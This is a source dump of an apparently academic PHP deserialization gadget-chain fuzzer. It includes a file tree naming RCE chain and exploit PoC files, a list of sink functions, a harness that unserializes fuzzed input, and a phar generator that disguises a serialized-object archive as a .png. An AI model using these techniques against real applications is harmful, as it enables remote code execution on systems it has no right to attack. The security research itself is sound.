├── .gitmodules
├── Analyzer
    ├── Units
    │   ├── Class.py
    │   ├── File.py
    │   ├── Method.py
    │   ├── Property.py
    │   └── __init__.py
    ├── __init__.py
    ├── analyzer.py
    ├── chain.py
    ├── chain.py.ccs
    ├── chain.py.org
    ├── chain.py.phpggc
    ├── dynamic.py
    ├── parser.py
    └── static.py
├── Detector
    ├── DetectorManager.py
    └── __init__.py
├── Files
    ├── FunctionParser.php
    ├── crawler_helper_append.php
    ├── parse_builtin.php
    ├── parser.php
    ├── phar_generator
    │   ├── class.php
    │   ├── generator.php
    │   └── tester.php
    └── sensitive_functions_list.txt
├── Fuzzer
    ├── DebugUtils.php
    ├── Executor.php
    ├── Executor.php.bak
    ├── Files
    │   ├── PUT_head.php
    │   ├── PUT_tail.php
    │   └── Sink_Info.php
    ├── FuzzManager.php
    ├── FuzzSlave.php
    ├── FuzzSlave.php.bak
    ├── Fuzzer.php
    ├── Instrumentor.php
    ├── PayloadCreator.php
    ├── PayloadCreator.php.bak
    ├── SeedNode.php
    ├── SeedTree.php
    ├── inc
    │   ├── ASTLoader.php
    │   ├── CodePrinter.php
    │   ├── ConstraintVisitor.php
    │   ├── IncludeParseVisitor.php
    │   ├── MyNodeVisitor.php
    │   ├── NormalNodeVisitor.php
    │   ├── STMTManipulator.php
    │   └── STMTManipulator7.php
    └── solving_test.py
├── Lib
    ├── crawlhelper
    │   ├── config.m4
    │   ├── crawlhelper.c
    │   └── php_crawlhelper.h
    ├── evalhook
    │   ├── .deps
    │   ├── .libs
    │   │   ├── evalhook.la
    │   │   ├── evalhook.lai
    │   │   ├── evalhook.o
    │   │   └── evalhook.so
    │   ├── README.md
    │   ├── config.m4
    │   ├── evalhook.c
    │   └── php_evalhook.h
    ├── evalhook7
    │   ├── .libs
    │   │   ├── evalhook.la
    │   │   ├── evalhook.lai
    │   │   ├── evalhook.o
    │   │   └── evalhook.so
    │   ├── README.md
    │   ├── config.m4
    │   ├── evalhook.c
    │   └── php_evalhook.h
    ├── pcntl54
    │   ├── CREDITS
    │   ├── README
    │   ├── config.m4
    │   ├── package.xml
    │   ├── pcntl.c
    │   ├── php_pcntl.h
    │   ├── php_signal.c
    │   ├── php_signal.h
    │   ├── test-pcntl.php
    │   └── tests
    │   │   ├── 001.phpt
    │   │   ├── 002.phpt
    │   │   ├── 003.phpt
    │   │   ├── bug47566.phpt
    │   │   ├── pcntl_alarm.phpt
    │   │   ├── pcntl_exec.phpt
    │   │   ├── pcntl_exec_2.phpt
    │   │   ├── pcntl_exec_3.phpt
    │   │   ├── pcntl_fork_basic.phpt
    │   │   ├── pcntl_fork_variation.phpt
    │   │   ├── pcntl_get_last_error.phpt
    │   │   ├── pcntl_signal.phpt
    │   │   ├── pcntl_signal_dispatch.phpt
    │   │   ├── pcntl_wait.phpt
    │   │   └── signal_closure_handler.phpt
    ├── pcntl56
    │   ├── README
    │   ├── config.m4
    │   ├── package.xml
    │   ├── pcntl.c
    │   ├── php_pcntl.h
    │   ├── php_signal.c
    │   ├── php_signal.h
    │   └── tests
    │   │   ├── 001.phpt
    │   │   ├── pcntl_exec.phpt
    │   │   ├── pcntl_exec_2.phpt
    │   │   ├── pcntl_fork_basic.phpt
    │   │   ├── pcntl_fork_variation.phpt
    │   │   ├── pcntl_get_last_error.phpt
    │   │   ├── pcntl_signal.phpt
    │   │   ├── pcntl_signal_dispatch.phpt
    │   │   ├── pcntl_wait.phpt
    │   │   └── signal_closure_handler.phpt
    ├── pcntl72
    │   ├── README
    │   ├── config.m4
    │   ├── package.xml
    │   ├── pcntl.c
    │   ├── php_pcntl.h
    │   ├── php_signal.c
    │   ├── php_signal.h
    │   └── tests
    │   │   ├── 001.phpt
    │   │   ├── async_signals.phpt
    │   │   ├── bug72154.phpt
    │   │   ├── bug73783.phpt
    │   │   ├── pcntl_exec.phpt
    │   │   ├── pcntl_exec_2.phpt
    │   │   ├── pcntl_fork_basic.phpt
    │   │   ├── pcntl_fork_variation.phpt
    │   │   ├── pcntl_get_last_error.phpt
    │   │   ├── pcntl_realtime_signal.phpt
    │   │   ├── pcntl_signal.phpt
    │   │   ├── pcntl_signal_dispatch.phpt
    │   │   ├── pcntl_signal_get_handler.phpt
    │   │   ├── pcntl_wait.phpt
    │   │   ├── pcntl_wait_rusage1.phpt
    │   │   ├── pcntl_waitpid_rusage1.phpt
    │   │   └── signal_closure_handler.phpt
    ├── rabbitmq_php
    │   └── composer.json
    └── rabbitmq_php7
    │   └── composer.json
├── PHPGGC
    ├── CodeIgniter4_RCE1.php
    ├── Drupal7_FD1.php
    ├── Drupal7_RCE1.php
    ├── Guzzle_FW1.php
    ├── Guzzle_INFO1.php
    ├── Guzzle_RCE1.php
    ├── Horde_RCE1.php
    ├── Laminas_FD1.php
    ├── Monolog_RCE1.php
    ├── Monolog_RCE2.php
    ├── Monolog_RCE3.php
    ├── Monolog_RCE4.php
    ├── PHPExcel_FD1.php
    ├── PHPExcel_FD2.php
    ├── PHPExcel_FD3.php
    ├── PHPExcel_FD4.php
    ├── Pydio_Guzzle_RCE1.php
    ├── Slim_RCE1.php
    ├── Smarty_FD1.php
    ├── Smarty_SSRF1.php
    ├── SwiftMailer_FD1.php
    ├── SwiftMailer_FW1.php
    ├── SwiftMailer_FW2.php
    ├── SwiftMailer_FW3.php
    ├── TCPDF_FD1.php
    ├── ThinkPHP_RCE1.php
    ├── WordPress_Dompdf_RCE1.php
    ├── WordPress_Dompdf_RCE2.php
    ├── WordPress_Guzzle_RCE1.php
    ├── WordPress_Guzzle_RCE2.php
    ├── WordPress_PHPExcel_RCE1.php
    ├── WordPress_PHPExcel_RCE2.php
    ├── WordPress_PHPExcel_RCE3.php
    ├── WordPress_PHPExcel_RCE4.php
    ├── WordPress_PHPExcel_RCE5.php
    ├── WordPress_PHPExcel_RCE6.php
    ├── WordPress_P_EmailSubscribers_RCE1.php
    ├── WordPress_P_EverestForms_RCE1.php
    ├── WordPress_P_WooCommerce_RCE1.php
    ├── WordPress_P_WooCommerce_RCE2.php
    ├── WordPress_P_YetAnotherStarsRating_RCE1.php
    ├── Yii2_RCE1.php
    ├── Yii2_RCE2.php
    ├── Yii_RCE1.php
    ├── ZendFramework_FD1.php
    ├── ZendFramework_RCE1.php
    ├── ZendFramework_RCE2.php
    ├── ZendFramework_RCE3.php
    └── ZendFramework_RCE4.php
├── Proxy
    ├── __init__.py
    ├── proxy.py
    ├── proxy.py.org
    └── proxy.py.phpggc
├── README.md
├── Trigger
    ├── ccs_run.py
    ├── cmsmadesimple_poc.py
    ├── contao_poc.py
    ├── cubecart_poc.py
    ├── drupal
    │   ├── .gitkeep
    │   ├── README.md
    │   ├── drupal_1.png
    │   ├── drupal_2.png
    │   ├── drupal_3.png
    │   └── drupal_4.png
    ├── glpi_poc.py
    ├── joomla_poc.py
    ├── lib_run.py
    ├── owa_poc.py
    ├── piwik_poc.py
    ├── typo3
    │   ├── .gitkeep
    │   ├── README.md
    │   ├── typo3_1.png
    │   ├── typo3_2.png
    │   ├── typo3_3.png
    │   ├── typo3_4.png
    │   ├── typo3_5.png
    │   ├── typo3_6.png
    │   └── typo3_7.png
    ├── vanilla_poc.py
    ├── woocommerce_poc.py
    ├── wordpress_poc.py
    └── wp_run.py
├── Utils
    ├── Bootstrap.py
    ├── HookFiles
    │   └── HookHead.php
    ├── __init__.py
    ├── arg.py
    └── makeHTTP.py
├── chain_analyzer
    ├── chain_analyzer.php
    ├── chain_list.php
    ├── display_code.php
    ├── index.php
    └── sink_list.php
├── config.py
├── htaccess.py
├── install_54.sh
├── install_56.sh
├── install_72.sh
├── requirements.txt
├── run.py
├── run_FUGIO_54.sh
├── run_FUGIO_54_all.sh
├── run_FUGIO_56.sh
├── run_FUGIO_72.sh
├── run_FUGIO_cubecart.sh
├── run_FUGIO_cubecart_all.sh
└── run_rabbitmq.sh


/.gitmodules:
--------------------------------------------------------------------------------
 1 | [submodule "Lib/php-jsond"]
 2 | 	path = Lib/php-jsond
 3 | 	url = https://github.com/bukka/php-jsond
 4 | [submodule "Lib/runkit"]
 5 | 	path = Lib/runkit
 6 | 	url = https://github.com/zenovich/runkit
 7 | [submodule "Lib/uopz"]
 8 | 	path = Lib/uopz
 9 | 	url = https://github.com/krakjoe/uopz
10 | [submodule "Lib/uopz7"]
11 | 	path = Lib/uopz7
12 | 	url = https://github.com/krakjoe/uopz
13 | [submodule "Lib/PHP-Parser"]
14 | 	path = Lib/PHP-Parser
15 | 	url = https://github.com/nikic/PHP-Parser
16 | [submodule "Lib/PHP-Parser7"]
17 | 	path = Lib/PHP-Parser7
18 | 	url = https://github.com/nikic/PHP-Parser
19 | 


--------------------------------------------------------------------------------
/Analyzer/Units/Class.py:
--------------------------------------------------------------------------------
 1 | class Class():
 2 |     def __init__(self, name):
 3 |         self.name = name
 4 |         self.real_name = name
 5 |         self.parents = []
 6 |         self.implements = []
 7 |         self.traits = []
 8 |         self.prop_list = {}
 9 |         self.method_list = {}
10 |         self.type = []
11 |         self.code = ''
12 |         self.namespace = ''
13 |         self.uses = {}


--------------------------------------------------------------------------------
/Analyzer/Units/File.py:
--------------------------------------------------------------------------------
1 | class File():
2 |     def __init__(self, path):
3 |         self.path = path
4 |         self.class_list = {}
5 |         self.func_list = {}


--------------------------------------------------------------------------------
/Analyzer/Units/Method.py:
--------------------------------------------------------------------------------
 1 | class Method():
 2 |     def __init__(self, name):
 3 |         self.name = name
 4 |         self.real_name = name
 5 |         self.type = []
 6 |         self.param_list = {}
 7 |         self.call_list = []
 8 |         self.var_list = []
 9 |         self.taint_list = []
10 |         self.for_list = []
11 |         self.array_access_list = {}
12 |         self.string_list = []
13 |         self.visibility = ''
14 |         self.static = False
15 |         self.real_name = name
16 |         self.real_class = ''
17 |         self.real_file = ''
18 |         self.code = ''
19 |         self.namespace = ''
20 |         self.uses = {}


--------------------------------------------------------------------------------
/Analyzer/Units/Property.py:
--------------------------------------------------------------------------------
1 | class Property():
2 |     def __init__(self, name):
3 |         self.name = name
4 |         self.type = []
5 |         self.value = None
6 |         self.visibility = ''
7 |         self.static = False
8 |         self.real_class = ''
9 |         self.real_file = ''


--------------------------------------------------------------------------------
/Analyzer/Units/__init__.py:
--------------------------------------------------------------------------------
1 | from .File import File
2 | from .Class import Class
3 | from .Method import Method
4 | from .Property import Property


--------------------------------------------------------------------------------
/Detector/__init__.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | FUZZER_DIR = os.path.dirname(os.path.abspath(__file__)) + '/../Fuzzer/fuzz.py'
 3 | 
 4 | MAGIC_METHODS = [
 5 |                 #  '__construct',
 6 |                  '__destruct',
 7 |                  '__call',
 8 |                  '__callStatic',
 9 |                  '__get',
10 |                  '__set',
11 |                  '__isset',
12 |                  '__unset',
13 |                  '__sleep',
14 |                  '__wakeup',
15 |                  '__toString',
16 |                 #  '__invoke',
17 |                  '__set_state',
18 |                  '__clone',
19 |                 #  '__debugInfo'
20 |                 ]


--------------------------------------------------------------------------------
/Files/FunctionParser.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | $func_info = array();
 3 | $func_names = explode("|", $argv[1]);
 4 | 
 5 | foreach($func_names as $func_name){
 6 |   $ref_func = new ReflectionFunction($func_name);
 7 |   foreach($ref_func->getParameters() as $param){
 8 |       $idx = $param->getPosition();
 9 |       $func_info[$func_name][$idx]['name'] = $param->getName();
10 |       $func_info[$func_name][$idx]['option'] = $param->isOptional();
11 |   }
12 | }
13 | 
14 | echo json_encode($func_info);
15 | ?>
16 | 


--------------------------------------------------------------------------------
/Files/crawler_helper_append.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | if(array_key_exists('point_crawl_helper',$_COOKIE) and
 3 |   $_COOKIE['point_crawl_helper'] == True){
 4 |   $crawl_helper_result = array();
 5 |   $crawl_helper_result['isset'] = array();
 6 |   $isset_lower_array = array();
 7 |   foreach(isset_log() as $isset_key => $isset_value){
 8 |     if(!in_array(strtolower($isset_value), $isset_lower_array) ){
 9 |       array_push($crawl_helper_result['isset'], $isset_value);
10 |       array_push($isset_lower_array, strtolower($isset_value));
11 |     }
12 |   }
13 |   $crawl_helper_result['array_key_exists'] = $GLOBALS['array_key_list_r353t'];
14 |   echo "CRAWL_HELPER_DATA_START_R353T";
15 |   echo json_encode($crawl_helper_result);
16 |   echo "CRAWL_HELPER_DATA_END_R353T";
17 | }
18 | ?>


--------------------------------------------------------------------------------
/Files/parse_builtin.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | if (PHP_VERSION >= "7.2") {
 3 | 	define("PHP7", true);
 4 | }
 5 | else {
 6 | 	define("PHP7", false);
 7 | }
 8 | 
 9 | if (PHP7) {
10 | 	require __DIR__ . '/../Lib/PHP-Parser7/vendor/autoload.php';
11 | }
12 | else {
13 | 	require __DIR__ . '/../Lib/PHP-Parser/vendor/autoload.php';
14 | }
15 | 
16 | use PhpParser\Node;
17 | use PhpParser\NodeVisitorAbstract;
18 | use PhpParser\Error;
19 | use PhpParser\ParserFactory;
20 | use PhpParser\NodeTraverser;
21 | 
22 | class MyNodeVisitor extends NodeVisitorAbstract
23 | {
24 |   public $builtin_count = 0;
25 |   public $builtin_func = array();
26 | 
27 |   private function toString($arg) {
28 | 		if ($arg == null) {
29 | 			return $arg;
30 | 		}
31 | 		else if (is_string($arg)) {
32 | 			return $arg;
33 | 		}
34 | 		else if ($arg instanceof Node\Scalar\EncapsedStringPart) {
35 | 			return $arg->value;
36 | 		}
37 | 		else if ($arg instanceof Node\Name) {
38 | 			return $arg->toString();
39 | 		}
40 | 		else if ($arg instanceof Node\Identifier) {
41 | 			return $arg->toString();
42 |     }
43 |   }
44 | 
45 | 	public function enterNode(Node $node) {
46 |     if ($node instanceof Node\Expr\FuncCall){
47 |       $func_name = $this->toString($node->name);
48 |       if (in_array($func_name, get_defined_functions()['internal'])){
49 |         $this->builtin_count += 1;
50 |         if (array_key_exists($func_name, $this->builtin_func)){
51 |           $this->builtin_func[$func_name] += 1;
52 |         }
53 |         else{
54 |           $this->builtin_func[$func_name] = 1;
55 |         }
56 |       }
57 |     }
58 |   }
59 | 
60 |   public function afterTraverse(array $nodes) {
61 |     foreach($this->builtin_func as $func=>$cnt)
62 |       echo "$func: $cnt \n";
63 |     echo "Total: " . $this->builtin_count . "\n";
64 |   }
65 | }
66 | 
67 | if (PHP7) {
68 | 	$parser = (new ParserFactory)->create(ParserFactory::PREFER_PHP7);
69 | }
70 | else {
71 | 	$parser = (new ParserFactory)->create(ParserFactory::PREFER_PHP5);
72 | }
73 | 
74 | $traverser = new NodeTraverser;
75 | $traverser->addVisitor(new MyNodeVisitor);
76 | 
77 | try {
78 |   $code = file_get_contents($argv[1]);
79 | 	$ast = $parser->parse($code);
80 | 	$ast = $traverser->traverse($ast);
81 | } catch (Error $error) {
82 | 	echo "Parse error: {$error->getMessage()}\n";
83 | 	return;
84 | }
85 | ?>


--------------------------------------------------------------------------------
/Files/phar_generator/class.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | class dummy_class_r353t{
 4 |     function __wakeup(){
 5 |         echo "[#] Wakeup()\n";
 6 |     }
 7 |     function __destruct(){
 8 |         echo "[#] Destruct()\n";
 9 |     }
10 | }
11 | 
12 | ?>
13 | 


--------------------------------------------------------------------------------
/Files/phar_generator/generator.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | error_reporting(E_ALL);
 3 | ini_set("display_errors", 1);
 4 | 
 5 | $output_path = __DIR__;
 6 | # CLASS DEFINE
 7 | class dummy_class_r353t{
 8 |     function __construct(){
 9 |         $this->used_methods = array();
10 |     }
11 | }
12 | 
13 | 
14 | # Internal CLASS
15 | $internal_phar = $output_path . "/exploit_internal.phar";
16 | $phar = new Phar($internal_phar);
17 | $phar->startBuffering();
18 | $phar->setStub("<?php __HALT_COMPILER();");
19 | 
20 | $payload = new dummy_class_r353t();
21 | $phar->setMetadata($payload);
22 | 
23 | $phar->addFromString("internal_dummy.txt", "DUMMY");
24 | $phar->stopBuffering();
25 | chmod($internal_phar, 0777);
26 | $changing_internal_file = "dummy.txt";
27 | $changing_internal_full_path = $output_path . "/" . $changing_internal_file;
28 | rename($internal_phar, $changing_internal_full_path);
29 | 
30 | # Permission & External class
31 | $external_phar = $output_path . "/dummy_class_r353t.phar";
32 | $phar = new Phar($external_phar);
33 | $phar->startBuffering();
34 | $phar->setStub("<?php __HALT_COMPILER();");
35 | 
36 | $payload = new dummy_class_r353t();
37 | $phar->setMetadata($payload);
38 | 
39 | $phar->addFile($changing_internal_file);
40 | $phar->stopBuffering();
41 | 
42 | # Permission & Rename
43 | chmod($external_phar, 0777);
44 | $phar_validator = $output_path . "/dummy_class_r353t.png";
45 | rename($external_phar, $phar_validator);
46 | 
47 | # Delete unnecessary file
48 | unlink($changing_internal_full_path);
49 | 
50 | echo md5_file($phar_validator);
51 | ?>
52 | 


--------------------------------------------------------------------------------
/Files/phar_generator/tester.php:
--------------------------------------------------------------------------------
1 | <?php
2 | error_reporting(E_ALL);
3 | ini_set("display_errors", 1);
4 | 
5 | require('class.php');
6 | 
7 | var_dump(file_exists('phar:///tmp/dummy_class_r353t.png'));
8 | ?>
9 | 


--------------------------------------------------------------------------------
/Files/sensitive_functions_list.txt:
--------------------------------------------------------------------------------
 1 | # FUNC_NAME|INJECT_IDXS (VULN Inject point. this is comma separated)
 2 | 
 3 | 
 4 | unserialize|1
 5 | # ==== NEED TO SET VULN INJECT POINT NUMBERS!! ====
 6 | copy|1
 7 | file_exists|1
 8 | file_get_contents|1
 9 | file_put_contents|1
10 | file|1
11 | fileatime|1
12 | filectime|1
13 | filegroup|1
14 | fileinode|1
15 | filemtime|1
16 | fileowner|1
17 | fileperms|1
18 | filesize|1
19 | filetype|1
20 | fopen|1
21 | is_dir|1
22 | is_executable|1
23 | is_file|1
24 | is_link|1
25 | is_readable|1
26 | is_writable|1
27 | lstat|1
28 | mkdir|1
29 | parse_ini_file|1
30 | readfile|1
31 | rename|1
32 | rmdir|1
33 | stat|1
34 | touch|1
35 | unlink|1
36 | md5_file|1
37 | sha1_file|1
38 | getimagesize|1
39 | 
40 | 
41 | # ========= THIS IS NOT FUNCCALL =========
42 | # include|1
43 | 


--------------------------------------------------------------------------------
/Fuzzer/Files/PUT_tail.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | if(getenv("FUZZ_CMD") === "FuzzerInit"){
 3 |     $GLOBALS['Feedback_cls']->init_output = array(
 4 |         "CONDITIONS" => $GLOBALS['Feedback_cls']->ifConstraints
 5 |     );
 6 |     exit();
 7 | }
 8 | 
 9 | // $entry_magic_method = "__destruct";
10 | $GLOBALS['Feedback_cls']->BranchPath = array();
11 | $userInput = base64_decode($argv[1]);
12 | // $userInput = $GLOBALS['Feedback_cls']->mutate();
13 | // echo "[#] User Input: " . $userInput . "\n";
14 | $fuzzed_class = unserialize($userInput);
15 | switch ($entry_magic_method){
16 |     case "__destruct":
17 |         unset($fuzzed_class);
18 |         break;
19 |     case "__construct": // TODO
20 |         break;
21 |     case "__call":
22 |         $fuzzed_class->non_existed_method();
23 |         break;
24 |     case "__callStatic":
25 |         $fuzzed_class::non_existed_method();
26 |         break;
27 |     case "__get":
28 |         $fuzzed_class->non_existed_property;
29 |         break;
30 |     case "__set":
31 |         $fuzzed_class->non_existed_property = NULL;
32 |         break;
33 |     case "__isset":
34 |         isset($fuzzed_class->non_existed_property);
35 |         break;
36 |     case "__unset":
37 |         unset($fuzzed_class->non_existed_property);
38 |         break;
39 |     case "__sleep":
40 |         serialize($fuzzed_class);
41 |         break;
42 |     case "__toString":
43 |         echo $fuzzed_class;
44 |         break;
45 |     case "__invoke":
46 |         $fuzzed_class(NULL);
47 |         break;
48 |     case "__set_state":
49 |         var_export($fuzzed_class);
50 |         break;
51 |     case "__clone":
52 |         clone $fuzzed_class;
53 |         break;
54 |     case "__debugInfo":
55 |         var_dump($fuzzed_class);
56 |         break;
57 |     default: // __wakeup
58 |         break;
59 | }
60 | /*
61 | $last_path = end($GLOBALS['Feedback_cls']->BranchPath);
62 | if($last_path['type'] == "IF-PRE" or
63 |     $last_path['type'] == "ELIF-PRE"){
64 |     foreach($GLOBALS['Feedback_cls']->goalPath as $goalPath){
65 |         if($last_path['hash'] == $goalPath['hash']){
66 |             foreach($GLOBALS['Feedback_cls']->ifConstraints as $ifConstraint){
67 |                 if($ifConstraint['hash'] == $last_path['hash']){
68 |                     echo "[!] We need to pass this cond\n";
69 |                     var_dump($ifConstraint);
70 |                 }
71 |             }
72 |         }
73 |     }
74 |     // if we do not need pass this cond.
75 |     // waive this cond?
76 | }
77 | */
78 | // var_dump($GLOBALS['Feedback_cls']->goalPath);
79 | // var_dump($GLOBALS['Feedback_cls']->BranchPath);
80 | 
81 | /*
82 | echo "[#] Branch passed count\n";
83 | echo count($GLOBALS['Feedback_cls']->BranchPath);
84 | echo "/";
85 | echo count($GLOBALS['Feedback_cls']->goalPath);
86 | echo "\n";
87 | var_dump($GLOBALS['Feedback_cls']->BranchPath);
88 | */
89 | 
90 | ?>
91 | 


--------------------------------------------------------------------------------
/Fuzzer/FuzzManager.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | class FuzzManager {
 3 |   public $max_gadget_dpeth = 0;
 4 |   public $seed_pool = array();
 5 |   public $banned_seed;
 6 |   public $chain_info;
 7 |   public $inst_put_file;
 8 | 
 9 |   function __construct($file_put_head, $file_put, $file_chain,
10 |                        $rabbitmq_ip, $rabbitmq_port,
11 |                        $rabbitmq_id, $rabbitmq_password,
12 |                        $rabbitmq_channel = NULL) {
13 |     $this->max_gadget_depth = 0;
14 |     $this->banned_seed = array();
15 | 
16 |     $this->file_put_head = $file_put_head;
17 |     $this->file_put = $file_put;
18 |     $this->file_chain = $file_chain;
19 |     $this->chain_info = $this->LoadChainInfo($this->file_chain);
20 |     $this->cand_methods = $this->chain_info->var_list->method_candidates;
21 |     $this->cand_props = $this->chain_info->var_list->prop_candidates;
22 |     $this->cand_foreach = $this->chain_info->var_list->foreach_candidates;
23 | 
24 |     $this->rabbitmq_settings = array(
25 |       "ip" => $rabbitmq_ip,
26 |       "port" => intval($rabbitmq_port),
27 |       "id" => $rabbitmq_id,
28 |       "password" => $rabbitmq_password,
29 |       "channel" => $rabbitmq_channel
30 |     );
31 |     // gadget_info => $this->chain_info->var_list->gadget_info;
32 |     // chain_info => $this->chain_info->chain
33 | 
34 |     $this->file_inst = $this->Instrumentation();
35 |     $this->RunSlave();
36 |   }
37 | 
38 |   function LoadChainInfo($file_chain) {
39 |     return json_decode(file_get_contents($file_chain));
40 |   }
41 | 
42 |   function Instrumentation() {
43 |     $inst_file = dirname($this->file_chain) .
44 |                   "/inst_PUT.php";
45 | 
46 |     if (!file_exists($inst_file)) {
47 |       shell_exec(
48 |         "php " .
49 |         __DIR__ .
50 |         "/Instrumentor.php " .
51 |         $this->file_put_head .
52 |         " " .
53 |         $this->file_put
54 |       );
55 |     }
56 |     return $inst_file;
57 |   }
58 | 
59 |   function RunSlave() {
60 |     $channel_name = str_replace("/", "_", realpath($this->file_chain));
61 |     $channel_name = str_replace(".", "_", $channel_name);
62 |     $this->rabbitmq_settings['channel'] = $channel_name;
63 | 
64 |     $fuzz_slave = new FuzzSlave($this->file_chain, $this->chain_info,
65 |                                 $this->cand_methods, $this->cand_props,
66 |                                 $this->cand_foreach, $this->file_inst,
67 |                                 $this->rabbitmq_settings);
68 | 
69 |     $this->seed_pool[$this->file_chain] = new SeedTree();
70 |     $fuzz_slave->RunFuzz($this->seed_pool[$this->file_chain]);
71 | 
72 |     /*
73 |     seed_pool was called by ref to RunFuzz(). Because, each fuzz slave share
74 |     their seed_pool tree to other slave.
75 |     */
76 |   }
77 | }


--------------------------------------------------------------------------------
/Fuzzer/Fuzzer.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | if (function_exists('uopz_allow_exit')) {
 3 |   uopz_allow_exit(true);
 4 | }
 5 | 
 6 | define('MAKE_AUX_PROP', '50'); // 50 %
 7 | define('MAKE_AUX_SUB_PROP', '50'); // 50%
 8 | define('MUTATE_PROP', '100'); // 100%
 9 | define('MAX_STR_LENGTH', '150');
10 | define('SEED_DEPTH_WEIGHT', '500'); // Deprecated
11 | define('SINK_REACH_WEIGHT', '10000'); // Deprecated
12 | define('MEMORY_LIMIT', '512M');
13 | define('ARR_OBJ_PROP', '70');
14 | define('FIRST_INDEX_OBJ_PROP', '95'); // Object is first index at ArrayObject Type
15 | define('SEED_BASIC_VALUE', 1);
16 | // $SEED_VALUE = SEED_BASIC_VALUE;
17 | $SEED_VALUE = intval(explode(" ", microtime())[0] * 1000000) * SEED_BASIC_VALUE;
18 | srand($SEED_VALUE);
19 | echo "[#] SEED_VALUE: ". $SEED_VALUE ."\n";
20 | 
21 | $DEBUG_FLAG = FALSE;
22 | 
23 | require_once __DIR__ . '/Files/Sink_Info.php';
24 | require_once __DIR__ . '/SeedNode.php';
25 | require_once __DIR__ . '/SeedTree.php';
26 | require_once __DIR__ . '/PayloadCreator.php';
27 | require_once __DIR__ . '/Executor.php';
28 | require_once __DIR__ . '/DebugUtils.php';
29 | require_once __DIR__ . '/FuzzSlave.php';
30 | require_once __DIR__ . '/FuzzManager.php';
31 | 
32 | $file_put_head = $argv[1];
33 | $file_put = $argv[2];
34 | $file_chain = $argv[3];
35 | $rabbitmq_ip = $argv[4];
36 | if (array_key_exists(5, $argv)) {
37 |   $FUZZING_TIMEOUT = (int) $argv[5];
38 | }
39 | else {
40 |   $FUZZING_TIMEOUT = INF;
41 | }
42 | $rabbitmq_port = 5672;
43 | $rabbitmq_id = "fugio";
44 | $rabbitmq_password = "fugio_password";
45 | $rabbitmq_channel = "";
46 | $fuzz_manager = new FuzzManager($file_put_head, $file_put, $file_chain,
47 |                                 $rabbitmq_ip, $rabbitmq_port,
48 |                                 $rabbitmq_id, $rabbitmq_password,
49 |                                 $rabbitmq_channel);
50 | 


--------------------------------------------------------------------------------
/Fuzzer/Instrumentor.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | if (PHP_VERSION >= "7.2") {
 3 | 	require __DIR__ . '/../Lib/PHP-Parser7/vendor/autoload.php';
 4 | 	require("inc/STMTManipulator7.php");
 5 | }
 6 | else {
 7 | 	require __DIR__ . '/../Lib/PHP-Parser/vendor/autoload.php';
 8 | 	require("inc/STMTManipulator.php");
 9 | }
10 | 
11 | require("inc/IncludeParseVisitor.php");
12 | require("inc/MyNodeVisitor.php");
13 | require("inc/ASTLoader.php");
14 | require("inc/CodePrinter.php");
15 | 
16 | $HEAD_FILE = $argv[1];
17 | $BODY_FILE = $argv[2];
18 | // $INFO_FILE = $argv[3];
19 | $OUTPUT_FILE = realpath(dirname($BODY_FILE)) . "/inst_PUT.php";
20 | 
21 | /*
22 | use PhpParser\NodeDumper;
23 | $dumper = new NodeDumper;
24 | $ast = astLoad($BODY_FILE, new MyNodeVisitor);
25 | echo $dumper->dump($ast);
26 | echo "\n===============================\n";
27 | */
28 | 
29 | 
30 | /*
31 | echo "[#] Target PHP - Before....\n";
32 | $beforeAst = astLoad($TARGET_FILE, new MyNodeVisitor);
33 | echo codePrint($beforeAst);
34 | */
35 | 
36 | // echo "\n======================================================\n";
37 | // echo "[#] Target PHP - After....\n";
38 | STMTManipulate($HEAD_FILE, $BODY_FILE);
39 | 
40 | // $head_AST = ASTLoad($HEAD_FILE);
41 | // $ManipulatedAst = STMTManipulate($TARGET_FILE);
42 | 
43 | // $fullAST = array_merge($head_AST, $ManipulatedAst);
44 | // file_put_contents($OUTPUT_FILE, codePrint($fullAST));
45 | // exit($OUTPUT_FILE);
46 | 
47 | // file_put_contents($OUTPUT_FILE, codePrint($ManipulatedAst));
48 | ?>
49 | 


--------------------------------------------------------------------------------
/Fuzzer/inc/CodePrinter.php:
--------------------------------------------------------------------------------
1 | <?php
2 | use PhpParser\PrettyPrinter;
3 | 
4 | function codePrint($ast){
5 |     $prettyPrinter = new PrettyPrinter\Standard;
6 |     return $prettyPrinter->prettyPrintFile($ast);
7 | }
8 | ?>
9 | 


--------------------------------------------------------------------------------
/Fuzzer/inc/IncludeParseVisitor.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | use PhpParser\Node;
 3 | use PhpParser\NodeVisitorAbstract;
 4 | 
 5 | class IncludeParseVisitor extends NodeVisitorAbstract
 6 | {
 7 | 	public function beforeTraverse(array $nodes) {
 8 |         $this->inc_files = array();
 9 |         $this->first_namespace = False;
10 |         $this->stop_traverse = False;
11 |         $this->file_type = "Body";
12 |     }
13 | 
14 | 	public function enterNode(Node $node) {
15 | 
16 |         if($this->stop_traverse){
17 |             return $node;
18 |         }
19 | 
20 |         if($node instanceof Node\Expr\Include_){
21 | 			$include_file = $node->expr->value;
22 | 			$include_file_info = pathinfo($include_file);
23 | 			$file_dir = $include_file_info['dirname'];
24 |             $file_name = $include_file_info['basename'];
25 |             $inst_include_file = $file_dir . "/inst-" . $file_name;
26 |             
27 |             $node->expr->value = $inst_include_file;
28 |             array_push($this->inc_files, $include_file);
29 |             
30 |             return $node;
31 |             
32 | 		}
33 |         if($node instanceof Node\Stmt\Namespace_){
34 |             if($this->first_namespace == False){
35 |                 $this->first_namespace = True;
36 |             }
37 |             else{
38 |                 $this->stop_traverse = True;
39 |                 $this->file_type = "Class";
40 |             }
41 |         }
42 |         if($node instanceof Node\Stmt\Function_){
43 |             $this->stop_traverse = True;
44 |             $this->file_type = "Function";
45 |         }
46 |     
47 |     }
48 | 	public function leaveNode(Node $node) {
49 |     
50 |     }
51 | 	public function afterTraverse(array $nodes) {
52 |         $output = array();
53 |         $output['inc_files'] = $this->inc_files;
54 |         $output['ast_nodes'] = $nodes;
55 |         $output['file_type'] = $this->file_type;
56 | 
57 |         return $output;
